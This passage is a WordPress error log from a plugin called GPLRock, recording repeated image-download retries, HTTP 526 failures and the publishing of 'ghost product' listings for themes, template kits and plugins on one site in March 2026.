/home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d3ffc519.webp [20-Mar-2026 01:34:09 UTC] GPLRock: Using pre-downloaded image for product artec-architecture-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d3ffc519.webp [20-Mar-2026 01:34:09 UTC] GPLRock: Ghost product published with image - Product ID: artec-architecture-elementor-template-kit [20-Mar-2026 01:34:10 UTC] GPLRock: Image downloaded successfully for product artcoin-bitcoin-cryptocurrency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-61952bdd.webp [20-Mar-2026 01:34:10 UTC] GPLRock: Image download failed for product umbala-fashion-clothing-store-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 01:34:11 UTC] GPLRock: Using pre-downloaded image for product artcoin-bitcoin-cryptocurrency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-61952bdd.webp [20-Mar-2026 01:34:11 UTC] GPLRock: Ghost product published with image - Product ID: artcoin-bitcoin-cryptocurrency-elementor-template-kit [20-Mar-2026 01:34:12 UTC] GPLRock: Image downloaded successfully for product artchi-modern-architecture-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-72913ecb.webp [20-Mar-2026 01:34:12 UTC] GPLRock: Using pre-downloaded image for product artchi-modern-architecture-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-72913ecb.webp [20-Mar-2026 01:34:12 UTC] GPLRock: Ghost product published with image - Product ID: artchi-modern-architecture-elementor-template-kit [20-Mar-2026 01:34:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/umbala---fashion--clothing-store-woocommerce-theme-20551.webp for product umbala-fashion-clothing-store-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [20-Mar-2026 01:34:13 UTC] GPLRock: Image download failed for product umbala-fashion-clothing-store-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 01:34:15 UTC] GPLRock: Image download failed for product umbala-fashion-clothing-store-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 01:34:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/umbala---fashion--clothing-store-woocommerce-theme-20551.webp for product umbala-fashion-clothing-store-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [20-Mar-2026 01:34:17 UTC] GPLRock WARNING: Image download failed for product umbala-fashion-clothing-store-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/umbala---fashion--clothing-store-woocommerce-theme-20551.webp [20-Mar-2026 01:34:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: umbala-fashion-clothing-store-woocommerce-theme [20-Mar-2026 01:34:17 UTC] GPLRock: Image download failed for product worksquare-coworking-and-office-space-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 01:34:19 UTC] GPLRock: Image download failed for product worksquare-coworking-and-office-space-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 01:34:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/worksquare---coworking-and-office-space-wordpress-theme-7520.webp for product worksquare-coworking-and-office-space-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [20-Mar-2026 01:34:22 UTC] GPLRock: Image download failed for product worksquare-coworking-and-office-space-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 01:34:24 UTC] GPLRock: Image download failed for product worksquare-coworking-and-office-space-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 01:34:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/worksquare---coworking-and-office-space-wordpress-theme-7520.webp for product worksquare-coworking-and-office-space-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [20-Mar-2026 01:34:27 UTC] GPLRock WARNING: Image download failed for product worksquare-coworking-and-office-space-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/worksquare---coworking-and-office-space-wordpress-theme-7520.webp [20-Mar-2026 01:34:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: worksquare-coworking-and-office-space-wordpress-theme [20-Mar-2026 01:34:27 UTC] GPLRock: Image download failed for product redchili-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 01:34:29 UTC] GPLRock: Image download failed for product redchili-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 01:34:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/redchili---restaurant-wordpress-theme-26304.webp for product redchili-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [20-Mar-2026 01:34:31 UTC] GPLRock: Image download failed for product redchili-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 01:34:33 UTC] GPLRock: Image download failed for product redchili-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 01:34:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/redchili---restaurant-wordpress-theme-26304.webp for product redchili-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [20-Mar-2026 01:34:36 UTC] GPLRock WARNING: Image download failed for product redchili-restaurant-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/redchili---restaurant-wordpress-theme-26304.webp [20-Mar-2026 01:34:36 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: redchili-restaurant-wordpress-theme [20-Mar-2026 01:34:36 UTC] GPLRock: Image download failed for product xsports-xtreme-sports-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 01:34:38 UTC] GPLRock: Image download failed for product xsports-xtreme-sports-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 01:34:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/xsports---xtreme-sports-wordpress-theme-19599.webp for product xsports-xtreme-sports-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [20-Mar-2026 01:34:41 UTC] GPLRock: Image download failed for product xsports-xtreme-sports-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 01:34:43 UTC] GPLRock: Image download failed for product xsports-xtreme-sports-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 01:34:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/xsports---xtreme-sports-wordpress-theme-19599.webp for product xsports-xtreme-sports-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [20-Mar-2026 01:34:45 UTC] GPLRock WARNING: Image download failed for product xsports-xtreme-sports-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/xsports---xtreme-sports-wordpress-theme-19599.webp [20-Mar-2026 01:34:45 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: xsports-xtreme-sports-wordpress-theme [20-Mar-2026 01:34:45 UTC] GPLRock: Image download failed for product aira-conditioning (attempt 1/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 01:34:47 UTC] GPLRock: Image download failed for product aira-conditioning (attempt 2/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 01:34:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aira---conditioning-18699.webp for product aira-conditioning after 3 attempts. HTTP Code: 526, Error: [20-Mar-2026 01:34:50 UTC] GPLRock: Image download failed for product aira-conditioning (attempt 1/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 01:34:52 UTC] GPLRock: Image download failed for product aira-conditioning (attempt 2/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 01:34:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aira---conditioning-18699.webp for product aira-conditioning after 3 attempts. HTTP Code: 526, Error: [20-Mar-2026 01:34:54 UTC] GPLRock WARNING: Image download failed for product aira-conditioning. URL: https://meldwp.com/wp-content/uploads/aira---conditioning-18699.webp [20-Mar-2026 01:34:54 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: aira-conditioning [20-Mar-2026 01:34:55 UTC] GPLRock: Image download failed for product paeon-medical-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 01:34:57 UTC] GPLRock: Image download failed for product paeon-medical-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 01:34:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/paeon---medical-wordpress-theme-9338.webp for product paeon-medical-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [20-Mar-2026 01:34:59 UTC] GPLRock: Image download failed for product paeon-medical-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 01:35:02 UTC] GPLRock: Image download failed for product paeon-medical-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 01:35:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/paeon---medical-wordpress-theme-9338.webp for product paeon-medical-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [20-Mar-2026 01:35:04 UTC] GPLRock WARNING: Image download failed for product paeon-medical-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/paeon---medical-wordpress-theme-9338.webp [20-Mar-2026 01:35:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: paeon-medical-wordpress-theme [20-Mar-2026 01:35:06 UTC] GPLRock: Image download failed for product thesaas-responsive-bootstrap-saas-startup-webapp-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 01:35:08 UTC] GPLRock: Image download failed for product thesaas-responsive-bootstrap-saas-startup-webapp-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 01:35:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/thesaas---responsive-bootstrap-saas-startup--webapp-template-27956.webp for product thesaas-responsive-bootstrap-saas-startup-webapp-template after 3 attempts. HTTP Code: 526, Error: [20-Mar-2026 01:35:10 UTC] GPLRock: Image download failed for product thesaas-responsive-bootstrap-saas-startup-webapp-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 01:35:13 UTC] GPLRock: Image download failed for product thesaas-responsive-bootstrap-saas-startup-webapp-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 01:35:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/thesaas---responsive-bootstrap-saas-startup--webapp-template-27956.webp for product thesaas-responsive-bootstrap-saas-startup-webapp-template after 3 attempts. HTTP Code: 526, Error: [20-Mar-2026 01:35:15 UTC] GPLRock WARNING: Image download failed for product thesaas-responsive-bootstrap-saas-startup-webapp-template. URL: https://meldwp.com/wp-content/uploads/thesaas---responsive-bootstrap-saas-startup--webapp-template-27956.webp [20-Mar-2026 01:35:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: thesaas-responsive-bootstrap-saas-startup-webapp-template [20-Mar-2026 06:15:24 UTC] GPLRock: Image downloaded successfully for product milan-blog-magazine-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2cb78ee3.webp [20-Mar-2026 06:15:24 UTC] GPLRock: Using pre-downloaded image for product milan-blog-magazine-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2cb78ee3.webp [20-Mar-2026 06:15:24 UTC] GPLRock: Ghost product published with image - Product ID: milan-blog-magazine-elementor-template-kit [20-Mar-2026 06:15:26 UTC] GPLRock: Image downloaded successfully for product mikrospa-spa-massage-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4b8621b4.webp [20-Mar-2026 06:15:26 UTC] GPLRock: Using pre-downloaded image for product mikrospa-spa-massage-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4b8621b4.webp [20-Mar-2026 06:15:26 UTC] GPLRock: Ghost product published with image - Product ID: mikrospa-spa-massage-elementor-template-kit [20-Mar-2026 06:15:27 UTC] GPLRock: Image downloaded successfully for product miker-movie-film-studio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-723877e4.webp [20-Mar-2026 06:15:28 UTC] GPLRock: Using pre-downloaded image for product miker-movie-film-studio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-723877e4.webp [20-Mar-2026 06:15:28 UTC] GPLRock: Ghost product published with image - Product ID: miker-movie-film-studio-elementor-template-kit [20-Mar-2026 06:15:28 UTC] GPLRock: Image download failed for product product-password-protector-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 06:15:29 UTC] GPLRock: Image downloaded successfully for product miju-conscious-product-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-176fe649.webp [20-Mar-2026 06:15:29 UTC] GPLRock: Using pre-downloaded image for product miju-conscious-product-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-176fe649.webp [20-Mar-2026 06:15:29 UTC] GPLRock: Ghost product published with image - Product ID: miju-conscious-product-elementor-template-kit [20-Mar-2026 06:15:30 UTC] GPLRock: Image download failed for product product-password-protector-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 06:15:30 UTC] GPLRock: Image downloaded successfully for product mih-personal-portfolio-resume-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b97fb635.webp [20-Mar-2026 06:15:31 UTC] GPLRock: Using pre-downloaded image for product mih-personal-portfolio-resume-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b97fb635.webp [20-Mar-2026 06:15:31 UTC] GPLRock: Ghost product published with image - Product ID: mih-personal-portfolio-resume-template-kit [20-Mar-2026 06:15:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/product-password-protector-for-woocommerce-14010.webp for product product-password-protector-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [20-Mar-2026 06:15:32 UTC] GPLRock: Image download failed for product product-password-protector-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 06:15:33 UTC] GPLRock: Image downloaded successfully for product microtech-tech-business-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7373aa8f.webp [20-Mar-2026 06:15:33 UTC] GPLRock: Using pre-downloaded image for product microtech-tech-business-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7373aa8f.webp [20-Mar-2026 06:15:33 UTC] GPLRock: Ghost product published with image - Product ID: microtech-tech-business-elementor-template-kit [20-Mar-2026 06:15:34 UTC] GPLRock: Image downloaded successfully for product mexa-digital-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-beddfb98.webp [20-Mar-2026 06:15:34 UTC] GPLRock: Using pre-downloaded image for product mexa-digital-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-beddfb98.webp [20-Mar-2026 06:15:34 UTC] GPLRock: Ghost product published with image - Product ID: mexa-digital-agency-elementor-template-kit [20-Mar-2026 06:15:35 UTC] GPLRock: Image download failed for product product-password-protector-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 06:15:35 UTC] GPLRock: Image downloaded successfully for product metta-cryptocurrency-blockchain-bitcoin-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-00e33417.webp [20-Mar-2026 06:15:36 UTC] GPLRock: Using pre-downloaded image for product metta-cryptocurrency-blockchain-bitcoin-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-00e33417.webp [20-Mar-2026 06:15:36 UTC] GPLRock: Ghost product published with image - Product ID: metta-cryptocurrency-blockchain-bitcoin-elementor-template-kit [20-Mar-2026 06:15:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/product-password-protector-for-woocommerce-14010.webp for product product-password-protector-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [20-Mar-2026 06:15:37 UTC] GPLRock WARNING: Image download failed for product product-password-protector-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/product-password-protector-for-woocommerce-14010.webp [20-Mar-2026 06:15:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: product-password-protector-for-woocommerce [20-Mar-2026 06:15:37 UTC] GPLRock: Image download failed for product soundcloud-player-word-press-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 06:15:37 UTC] GPLRock: Image downloaded successfully for product metoy-toys-craft-industry-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4d7193e4.webp [20-Mar-2026 06:15:37 UTC] GPLRock: Using pre-downloaded image for product metoy-toys-craft-industry-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4d7193e4.webp [20-Mar-2026 06:15:37 UTC] GPLRock: Ghost product published with image - Product ID: metoy-toys-craft-industry-elementor-template-kit [20-Mar-2026 06:15:38 UTC] GPLRock: Image downloaded successfully for product merk-branding-solution-advertising-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1d40e330.webp [20-Mar-2026 06:15:38 UTC] GPLRock: Using pre-downloaded image for product merk-branding-solution-advertising-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1d40e330.webp [20-Mar-2026 06:15:38 UTC] GPLRock: Ghost product published with image - Product ID: merk-branding-solution-advertising-agency-elementor-template-kit [20-Mar-2026 06:15:39 UTC] GPLRock: Image download failed for product soundcloud-player-word-press-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 06:15:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/soundcloud-player-word-press-plugin-11499.webp for product soundcloud-player-word-press-plugin after 3 attempts. HTTP Code: 526, Error: [20-Mar-2026 06:15:41 UTC] GPLRock: Image download failed for product soundcloud-player-word-press-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 06:15:43 UTC] GPLRock: Image download failed for product soundcloud-player-word-press-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 06:15:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/soundcloud-player-word-press-plugin-11499.webp for product soundcloud-player-word-press-plugin after 3 attempts. HTTP Code: 526, Error: [20-Mar-2026 06:15:45 UTC] GPLRock WARNING: Image download failed for product soundcloud-player-word-press-plugin. URL: https://meldwp.com/wp-content/uploads/soundcloud-player-word-press-plugin-11499.webp [20-Mar-2026 06:15:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: soundcloud-player-word-press-plugin [20-Mar-2026 06:15:47 UTC] GPLRock: Image download failed for product post-accordion-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 06:15:49 UTC] GPLRock: Image download failed for product post-accordion-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 06:15:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/post-accordion-for-wordpress-9264.webp for product post-accordion-for-wordpress after 3 attempts. HTTP Code: 526, Error: [20-Mar-2026 06:15:51 UTC] GPLRock: Image download failed for product post-accordion-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 06:15:53 UTC] GPLRock: Image download failed for product post-accordion-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 06:15:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/post-accordion-for-wordpress-9264.webp for product post-accordion-for-wordpress after 3 attempts. HTTP Code: 526, Error: [20-Mar-2026 06:15:55 UTC] GPLRock WARNING: Image download failed for product post-accordion-for-wordpress. URL: https://meldwp.com/wp-content/uploads/post-accordion-for-wordpress-9264.webp [20-Mar-2026 06:15:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: post-accordion-for-wordpress [20-Mar-2026 06:15:56 UTC] GPLRock: Image download failed for product woo-quote-a-product (attempt 1/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 06:15:58 UTC] GPLRock: Image download failed for product woo-quote-a-product (attempt 2/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 06:16:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woo-quote-a-product-18965.webp for product woo-quote-a-product after 3 attempts. HTTP Code: 526, Error: [20-Mar-2026 06:16:00 UTC] GPLRock: Image download failed for product woo-quote-a-product (attempt 1/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 06:16:03 UTC] GPLRock: Image download failed for product woo-quote-a-product (attempt 2/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 06:16:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woo-quote-a-product-18965.webp for product woo-quote-a-product after 3 attempts. HTTP Code: 526, Error: [20-Mar-2026 06:16:05 UTC] GPLRock WARNING: Image download failed for product woo-quote-a-product. URL: https://meldwp.com/wp-content/uploads/woo-quote-a-product-18965.webp [20-Mar-2026 06:16:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woo-quote-a-product [20-Mar-2026 06:16:05 UTC] GPLRock: Image download failed for product image-hover-elements-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 06:16:07 UTC] GPLRock: Image download failed for product image-hover-elements-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 06:16:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/image-hover-elements-for-elementor-27188.webp for product image-hover-elements-for-elementor after 3 attempts. HTTP Code: 526, Error: [20-Mar-2026 06:16:09 UTC] GPLRock: Image download failed for product image-hover-elements-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 06:16:11 UTC] GPLRock: Image download failed for product image-hover-elements-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 06:16:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/image-hover-elements-for-elementor-27188.webp for product image-hover-elements-for-elementor after 3 attempts. HTTP Code: 526, Error: [20-Mar-2026 06:16:13 UTC] GPLRock WARNING: Image download failed for product image-hover-elements-for-elementor. URL: https://meldwp.com/wp-content/uploads/image-hover-elements-for-elementor-27188.webp [20-Mar-2026 06:16:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: image-hover-elements-for-elementor [20-Mar-2026 06:16:14 UTC] GPLRock: Image download failed for product advanced-heading-and-animated-text-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 06:16:16 UTC] GPLRock: Image download failed for product advanced-heading-and-animated-text-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 06:16:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/advanced-heading-and-animated-text-for-elementor-2824.webp for product advanced-heading-and-animated-text-for-elementor after 3 attempts. HTTP Code: 526, Error: [20-Mar-2026 06:16:18 UTC] GPLRock: Image download failed for product advanced-heading-and-animated-text-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 06:16:20 UTC] GPLRock: Image download failed for product advanced-heading-and-animated-text-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 06:16:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/advanced-heading-and-animated-text-for-elementor-2824.webp for product advanced-heading-and-animated-text-for-elementor after 3 attempts. HTTP Code: 526, Error: [20-Mar-2026 06:16:22 UTC] GPLRock WARNING: Image download failed for product advanced-heading-and-animated-text-for-elementor. URL: https://meldwp.com/wp-content/uploads/advanced-heading-and-animated-text-for-elementor-2824.webp [20-Mar-2026 06:16:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: advanced-heading-and-animated-text-for-elementor [20-Mar-2026 06:16:23 UTC] GPLRock: Image download failed for product wpbakery-page-builder-add-on-image-accordion-profile-panel (attempt 1/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 06:16:25 UTC] GPLRock: Image download failed for product wpbakery-page-builder-add-on-image-accordion-profile-panel (attempt 2/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 06:16:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpbakery-page-builder-add-on---image-accordion--profile-panel-22531.webp for product wpbakery-page-builder-add-on-image-accordion-profile-panel after 3 attempts. HTTP Code: 526, Error: [20-Mar-2026 06:16:27 UTC] GPLRock: Image download failed for product wpbakery-page-builder-add-on-image-accordion-profile-panel (attempt 1/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 06:16:29 UTC] GPLRock: Image download failed for product wpbakery-page-builder-add-on-image-accordion-profile-panel (attempt 2/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 06:16:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpbakery-page-builder-add-on---image-accordion--profile-panel-22531.webp for product wpbakery-page-builder-add-on-image-accordion-profile-panel after 3 attempts. HTTP Code: 526, Error: [20-Mar-2026 06:16:31 UTC] GPLRock WARNING: Image download failed for product wpbakery-page-builder-add-on-image-accordion-profile-panel. URL: https://meldwp.com/wp-content/uploads/wpbakery-page-builder-add-on---image-accordion--profile-panel-22531.webp [20-Mar-2026 06:16:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wpbakery-page-builder-add-on-image-accordion-profile-panel [20-Mar-2026 06:16:31 UTC] GPLRock: Image download failed for product charts-and-graphs-wordpress-visual-designer (attempt 1/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 06:16:33 UTC] GPLRock: Image download failed for product charts-and-graphs-wordpress-visual-designer (attempt 2/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 06:16:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/charts-and-graphs-wordpress-visual-designer-12745.webp for product charts-and-graphs-wordpress-visual-designer after 3 attempts. HTTP Code: 526, Error: [20-Mar-2026 06:16:36 UTC] GPLRock: Image download failed for product charts-and-graphs-wordpress-visual-designer (attempt 1/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 06:16:38 UTC] GPLRock: Image download failed for product charts-and-graphs-wordpress-visual-designer (attempt 2/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 06:16:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/charts-and-graphs-wordpress-visual-designer-12745.webp for product charts-and-graphs-wordpress-visual-designer after 3 attempts. HTTP Code: 526, Error: [20-Mar-2026 06:16:40 UTC] GPLRock WARNING: Image download failed for product charts-and-graphs-wordpress-visual-designer. URL: https://meldwp.com/wp-content/uploads/charts-and-graphs-wordpress-visual-designer-12745.webp [20-Mar-2026 06:16:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: charts-and-graphs-wordpress-visual-designer [20-Mar-2026 06:16:41 UTC] GPLRock: Image download failed for product nmi-payments-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 06:16:43 UTC] GPLRock: Image download failed for product nmi-payments-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 06:16:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nmi-payments-for-woocommerce-29616.webp for product nmi-payments-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [20-Mar-2026 06:16:45 UTC] GPLRock: Image download failed for product nmi-payments-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 06:16:47 UTC] GPLRock: Image download failed for product nmi-payments-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 06:16:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nmi-payments-for-woocommerce-29616.webp for product nmi-payments-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [20-Mar-2026 06:16:49 UTC] GPLRock WARNING: Image download failed for product nmi-payments-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/nmi-payments-for-woocommerce-29616.webp [20-Mar-2026 06:16:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: nmi-payments-for-woocommerce [20-Mar-2026 06:16:50 UTC] GPLRock: Image download failed for product device-slider-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, 